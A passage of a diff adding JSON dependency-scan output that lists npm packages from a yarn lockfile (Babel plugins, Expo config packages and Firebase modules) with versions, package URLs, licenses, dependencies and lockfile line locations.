+ "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 384, + "EndLine": 389 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-object-rest-spread@7.8.3", + "Name": "@babel/plugin-syntax-object-rest-spread", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-object-rest-spread@7.8.3", + "UID": "ccd870846444c254" + }, + "Version": "7.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 391, + "EndLine": 396 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-optional-catch-binding@7.8.3", + "Name": "@babel/plugin-syntax-optional-catch-binding", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-optional-catch-binding@7.8.3", + "UID": "350e02b47b92f360" + }, + "Version": "7.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 398, + "EndLine": 403 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-optional-chaining@7.8.3", + "Name": "@babel/plugin-syntax-optional-chaining", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-optional-chaining@7.8.3", + "UID": "f39f2de4e96fab92" + }, + "Version": "7.8.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 405, + "EndLine": 410 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-private-property-in-object@7.14.5", + "Name": "@babel/plugin-syntax-private-property-in-object", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-private-property-in-object@7.14.5", + "UID": "5bc976a3e34bc0b1" + }, + "Version": "7.14.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 412, + "EndLine": 417 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-top-level-await@7.14.5", + "Name": "@babel/plugin-syntax-top-level-await", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-top-level-await@7.14.5", + "UID": "93092bffdb9ddb6d" + }, + "Version": "7.14.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 419, + "EndLine": 424 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-syntax-typescript@7.27.1", + "Name": "@babel/plugin-syntax-typescript", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-syntax-typescript@7.27.1", + "UID": "7810517fa4389044" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 426, + "EndLine": 431 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-transform-arrow-functions@7.27.1", + "Name": "@babel/plugin-transform-arrow-functions", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-arrow-functions@7.27.1", + "UID": "9742a2784a5dbf23" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 441, + "EndLine": 446 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-transform-class-properties@7.27.1", + "Name": "@babel/plugin-transform-class-properties", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-class-properties@7.27.1", + "UID": "30ef223986dbfa1e" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-create-class-features-plugin@7.28.3", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 480, + "EndLine": 486 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-transform-classes@7.28.4", + "Name": "@babel/plugin-transform-classes", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-classes@7.28.4", + "UID": "ae5b9f691ec69ebf" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-annotate-as-pure@7.27.3", + "@babel/helper-compilation-targets@7.27.2", + "@babel/helper-globals@7.28.0", + "@babel/helper-plugin-utils@7.27.1", + "@babel/helper-replace-supers@7.27.1", + "@babel/traverse@7.28.4" + ], + "Locations": [ + { + "StartLine": 496, + "EndLine": 506 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-transform-modules-commonjs@7.27.1", + "Name": "@babel/plugin-transform-modules-commonjs", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-modules-commonjs@7.27.1", + "UID": "1db01d81e6fe5aec" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-module-transforms@7.28.3", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 637, + "EndLine": 643 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-transform-nullish-coalescing-operator@7.27.1", + "Name": "@babel/plugin-transform-nullish-coalescing-operator", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-nullish-coalescing-operator@7.27.1", + "UID": "25a7ee017fa32064" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 678, + "EndLine": 683 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-transform-optional-chaining@7.27.1", + "Name": "@babel/plugin-transform-optional-chaining", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-optional-chaining@7.27.1", + "UID": "40776f77e33002b9" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1", + "@babel/helper-skip-transparent-expression-wrappers@7.27.1" + ], + "Locations": [ + { + "StartLine": 718, + "EndLine": 724 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-transform-shorthand-properties@7.27.1", + "Name": "@babel/plugin-transform-shorthand-properties", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-shorthand-properties@7.27.1", + "UID": "bd0498bb1ad13919" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 823, + "EndLine": 828 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-transform-template-literals@7.27.1", + "Name": "@babel/plugin-transform-template-literals", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-template-literals@7.27.1", + "UID": "6c7797cbe8a2ef74" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 845, + "EndLine": 850 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-transform-typescript@7.28.0", + "Name": "@babel/plugin-transform-typescript", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-typescript@7.28.0", + "UID": "c794f5e30d11e4ce" + }, + "Version": "7.28.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-annotate-as-pure@7.27.3", + "@babel/helper-create-class-features-plugin@7.28.3", + "@babel/helper-plugin-utils@7.27.1", + "@babel/helper-skip-transparent-expression-wrappers@7.27.1", + "@babel/plugin-syntax-typescript@7.27.1" + ], + "Locations": [ + { + "StartLine": 859, + "EndLine": 868 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/plugin-transform-unicode-regex@7.27.1", + "Name": "@babel/plugin-transform-unicode-regex", + "Identifier": { + "PURL": "pkg:npm/%40babel/plugin-transform-unicode-regex@7.27.1", + "UID": "7bfae57cd415f58" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-create-regexp-features-plugin@7.27.1", + "@babel/helper-plugin-utils@7.27.1" + ], + "Locations": [ + { + "StartLine": 885, + "EndLine": 891 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/preset-typescript@7.27.1", + "Name": "@babel/preset-typescript", + "Identifier": { + "PURL": "pkg:npm/%40babel/preset-typescript@7.27.1", + "UID": "6c61a48ef7276c1c" + }, + "Version": "7.27.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-plugin-utils@7.27.1", + "@babel/helper-validator-option@7.27.1", + "@babel/plugin-syntax-jsx@7.27.1", + "@babel/plugin-transform-modules-commonjs@7.27.1", + "@babel/plugin-transform-typescript@7.28.0" + ], + "Locations": [ + { + "StartLine": 986, + "EndLine": 995 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/runtime@7.28.4", + "Name": "@babel/runtime", + "Identifier": { + "PURL": "pkg:npm/%40babel/runtime@7.28.4", + "UID": "76a4949203cb3496" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 997, + "EndLine": 1000 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/template@7.27.2", + "Name": "@babel/template", + "Identifier": { + "PURL": "pkg:npm/%40babel/template@7.27.2", + "UID": "346287b835286992" + }, + "Version": "7.27.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/code-frame@7.27.1", + "@babel/parser@7.28.4", + "@babel/types@7.28.4" + ], + "Locations": [ + { + "StartLine": 1002, + "EndLine": 1009 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/traverse@7.28.4", + "Name": "@babel/traverse", + "Identifier": { + "PURL": "pkg:npm/%40babel/traverse@7.28.4", + "UID": "6c655f979214e216" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/code-frame@7.27.1", + "@babel/generator@7.28.3", + "@babel/helper-globals@7.28.0", + "@babel/parser@7.28.4", + "@babel/template@7.27.2", + "@babel/types@7.28.4", + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 1024, + "EndLine": 1035 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/traverse--for-generate-function-map@7.28.4", + "Name": "@babel/traverse--for-generate-function-map", + "Identifier": { + "PURL": "pkg:npm/%40babel/traverse--for-generate-function-map@7.28.4", + "UID": "f1203ced1fb0401b" + }, + "Version": "7.28.4", + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/code-frame@7.27.1", + "@babel/generator@7.28.3", + "@babel/helper-globals@7.28.0", + "@babel/parser@7.28.4", + "@babel/template@7.27.2", + "@babel/types@7.28.4", + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 1011, + "EndLine": 1022 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@babel/types@7.28.4", + "Name": "@babel/types", + "Identifier": { + "PURL": "pkg:npm/%40babel/types@7.28.4", + "UID": "85d77357e93ad007" + }, + "Version": "7.28.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/helper-string-parser@7.27.1", + "@babel/helper-validator-identifier@7.27.1" + ], + "Locations": [ + { + "StartLine": 1037, + "EndLine": 1043 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@callstack/react-theme-provider@3.0.9", + "Name": "@callstack/react-theme-provider", + "Identifier": { + "PURL": "pkg:npm/%40callstack/react-theme-provider@3.0.9", + "UID": "70b306d48db360cf" + }, + "Version": "3.0.9", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "deepmerge@3.3.0", + "hoist-non-react-statics@3.3.2" + ], + "Locations": [ + { + "StartLine": 1050, + "EndLine": 1056 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@craftzdog/react-native-buffer@6.1.1", + "Name": "@craftzdog/react-native-buffer", + "Identifier": { + "PURL": "pkg:npm/%40craftzdog/react-native-buffer@6.1.1", + "UID": "d415388ff4e5689f" + }, + "Version": "6.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ieee754@1.2.1", + "react-native-quick-base64@2.2.2" + ], + "Locations": [ + { + "StartLine": 1058, + "EndLine": 1064 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@egjs/hammerjs@2.0.17", + "Name": "@egjs/hammerjs", + "Identifier": { + "PURL": "pkg:npm/%40egjs/hammerjs@2.0.17", + "UID": "6a1c7a1eea925d4b" + }, + "Version": "2.0.17", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/hammerjs@2.0.46" + ], + "Locations": [ + { + "StartLine": 1071, + "EndLine": 1076 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@expo/config-plugins@10.1.2", + "Name": "@expo/config-plugins", + "Identifier": { + "PURL": "pkg:npm/%40expo/config-plugins@10.1.2", + "UID": "295d7e0935a3e548" + }, + "Version": "10.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@expo/config-types@53.0.5", + "@expo/json-file@9.1.5", + "@expo/plist@0.3.5", + "@expo/sdk-runtime-versions@1.0.0", + "chalk@4.1.2", + "debug@4.4.3", + "getenv@2.0.0", + "glob@10.4.5", + "resolve-from@5.0.0", + "semver@7.7.3", + "slash@3.0.0", + "slugify@1.6.6", + "xcode@3.0.1", + "xml2js@0.6.0" + ], + "Locations": [ + { + "StartLine": 1110, + "EndLine": 1128 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@expo/config-types@53.0.5", + "Name": "@expo/config-types", + "Identifier": { + "PURL": "pkg:npm/%40expo/config-types@53.0.5", + "UID": "b185a9183eaa4a70" + }, + "Version": "53.0.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1130, + "EndLine": 1133 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@expo/json-file@9.1.5", + "Name": "@expo/json-file", + "Identifier": { + "PURL": "pkg:npm/%40expo/json-file@9.1.5", + "UID": "19c52f405a254277" + }, + "Version": "9.1.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/code-frame@7.10.4", + "json5@2.2.3" + ], + "Locations": [ + { + "StartLine": 1135, + "EndLine": 1141 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@expo/plist@0.3.5", + "Name": "@expo/plist", + "Identifier": { + "PURL": "pkg:npm/%40expo/plist@0.3.5", + "UID": "2cac886fbe944107" + }, + "Version": "0.3.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@xmldom/xmldom@0.8.11", + "base64-js@1.5.1", + "xmlbuilder@15.1.1" + ], + "Locations": [ + { + "StartLine": 1143, + "EndLine": 1150 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@expo/sdk-runtime-versions@1.0.0", + "Name": "@expo/sdk-runtime-versions", + "Identifier": { + "PURL": "pkg:npm/%40expo/sdk-runtime-versions@1.0.0", + "UID": "eb9af91b6ee10c8d" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1152, + "EndLine": 1155 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/ai@2.2.1", + "Name": "@firebase/ai", + "Identifier": { + "PURL": "pkg:npm/%40firebase/ai@2.2.1", + "UID": "fd60398706c402c2" + }, + "Version": "2.2.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-check-interop-types@0.3.3", + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1157, + "EndLine": 1166 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/analytics@0.10.18", + "Name": "@firebase/analytics", + "Identifier": { + "PURL": "pkg:npm/%40firebase/analytics@0.10.18", + "UID": "9f0d3e3e756577f3" + }, + "Version": "0.10.18", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/installations@0.6.19", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1184, + "EndLine": 1193 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/analytics-compat@0.2.24", + "Name": "@firebase/analytics-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/analytics-compat@0.2.24", + "UID": "5c7779bc7e3acd9e" + }, + "Version": "0.2.24", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/analytics@0.10.18", + "@firebase/analytics-types@0.8.3", + "@firebase/component@0.7.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1168, + "EndLine": 1177 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/analytics-types@0.8.3", + "Name": "@firebase/analytics-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/analytics-types@0.8.3", + "UID": "a24b559ce60a70ac" + }, + "Version": "0.8.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1179, + "EndLine": 1182 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/app@0.14.2", + "Name": "@firebase/app", + "Identifier": { + "PURL": "pkg:npm/%40firebase/app@0.14.2", + "UID": "98b14aeeb5ad7a97" + }, + "Version": "0.14.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "idb@7.1.1", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1243, + "EndLine": 1252 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/app-check@0.11.0", + "Name": "@firebase/app-check", + "Identifier": { + "PURL": "pkg:npm/%40firebase/app-check@0.11.0", + "UID": "75949b0846bc3850" + }, + "Version": "0.11.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1217, + "EndLine": 1225 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/app-check-compat@0.4.0", + "Name": "@firebase/app-check-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/app-check-compat@0.4.0", + "UID": "5380ee0646d181e2" + }, + "Version": "0.4.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-check@0.11.0", + "@firebase/app-check-types@0.5.3", + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1195, + "EndLine": 1205 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/app-check-interop-types@0.3.3", + "Name": "@firebase/app-check-interop-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/app-check-interop-types@0.3.3", + "UID": "7f686dc723a6b7af" + }, + "Version": "0.3.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1207, + "EndLine": 1210 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/app-check-types@0.5.3", + "Name": "@firebase/app-check-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/app-check-types@0.5.3", + "UID": "532cfa584977653a" + }, + "Version": "0.5.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1212, + "EndLine": 1215 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/app-compat@0.5.2", + "Name": "@firebase/app-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/app-compat@0.5.2", + "UID": "bf6dd59673c3fb55" + }, + "Version": "0.5.2", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app@0.14.2", + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1227, + "EndLine": 1236 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/app-types@0.9.3", + "Name": "@firebase/app-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/app-types@0.9.3", + "UID": "2ffc8e14cca6d9be" + }, + "Version": "0.9.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1238, + "EndLine": 1241 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/auth@1.11.0", + "Name": "@firebase/auth", + "Identifier": { + "PURL": "pkg:npm/%40firebase/auth@1.11.0", + "UID": "896af45d09d22eb6" + }, + "Version": "1.11.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1275, + "EndLine": 1283 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/auth-compat@0.6.0", + "Name": "@firebase/auth-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/auth-compat@0.6.0", + "UID": "3370adced3f51da7" + }, + "Version": "0.6.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/auth@1.11.0", + "@firebase/auth-types@0.13.0", + "@firebase/component@0.7.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1254, + "EndLine": 1263 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/auth-interop-types@0.2.4", + "Name": "@firebase/auth-interop-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/auth-interop-types@0.2.4", + "UID": "ff590ff175fbf99e" + }, + "Version": "0.2.4", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1265, + "EndLine": 1268 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/auth-types@0.13.0", + "Name": "@firebase/auth-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/auth-types@0.13.0", + "UID": "96d3ff6a13c0a6c4" + }, + "Version": "0.13.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1270, + "EndLine": 1273 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/component@0.7.0", + "Name": "@firebase/component", + "Identifier": { + "PURL": "pkg:npm/%40firebase/component@0.7.0", + "UID": "37c7747956771ec6" + }, + "Version": "0.7.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1285, + "EndLine": 1291 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/data-connect@0.3.11", + "Name": "@firebase/data-connect", + "Identifier": { + "PURL": "pkg:npm/%40firebase/data-connect@0.3.11", + "UID": "d79150c2fbfd7c6b" + }, + "Version": "0.3.11", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/auth-interop-types@0.2.4", + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1293, + "EndLine": 1302 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/database@1.1.0", + "Name": "@firebase/database", + "Identifier": { + "PURL": "pkg:npm/%40firebase/database@1.1.0", + "UID": "4f4b10db63495689" + }, + "Version": "1.1.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-check-interop-types@0.3.3", + "@firebase/auth-interop-types@0.2.4", + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "faye-websocket@0.11.4", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1324, + "EndLine": 1335 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/database-compat@2.1.0", + "Name": "@firebase/database-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/database-compat@2.1.0", + "UID": "344f2a1f0fb607e2" + }, + "Version": "2.1.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/database@1.1.0", + "@firebase/database-types@1.0.16", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1304, + "EndLine": 1314 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/database-types@1.0.16", + "Name": "@firebase/database-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/database-types@1.0.16", + "UID": "b1df3254f2392935" + }, + "Version": "1.0.16", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-types@0.9.3", + "@firebase/util@1.13.0" + ], + "Locations": [ + { + "StartLine": 1316, + "EndLine": 1322 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/firestore@4.9.1", + "Name": "@firebase/firestore", + "Identifier": { + "PURL": "pkg:npm/%40firebase/firestore@4.9.1", + "UID": "87c152ec81aab79d" + }, + "Version": "4.9.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/logger@0.5.0", + "@firebase/util@1.13.0", + "@firebase/webchannel-wrapper@1.0.4", + "@grpc/grpc-js@1.9.15", + "@grpc/proto-loader@0.7.15", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1353, + "EndLine": 1364 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/firestore-compat@0.4.1", + "Name": "@firebase/firestore-compat", + "Identifier": { + "PURL": "pkg:npm/%40firebase/firestore-compat@0.4.1", + "UID": "f5f9c89589beb09e" + }, + "Version": "0.4.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/component@0.7.0", + "@firebase/firestore@4.9.1", + "@firebase/firestore-types@3.0.3", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1337, + "EndLine": 1346 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/firestore-types@3.0.3", + "Name": "@firebase/firestore-types", + "Identifier": { + "PURL": "pkg:npm/%40firebase/firestore-types@3.0.3", + "UID": "e4cd7693c05a7d1c" + }, + "Version": "3.0.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 1348, + "EndLine": 1351 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/functions@0.13.1", + "Name": "@firebase/functions", + "Identifier": { + "PURL": "pkg:npm/%40firebase/functions@0.13.1", + "UID": "29c096beb4832fcd" + }, + "Version": "0.13.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/app-check-interop-types@0.3.3", + "@firebase/auth-interop-types@0.2.4", + "@firebase/component@0.7.0", + "@firebase/messaging-interop-types@0.2.3", + "@firebase/util@1.13.0", + "tslib@2.8.1" + ], + "Locations": [ + { + "StartLine": 1382, + "EndLine": 1392 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@firebase/functions-compat@0.4.1", + "Name": 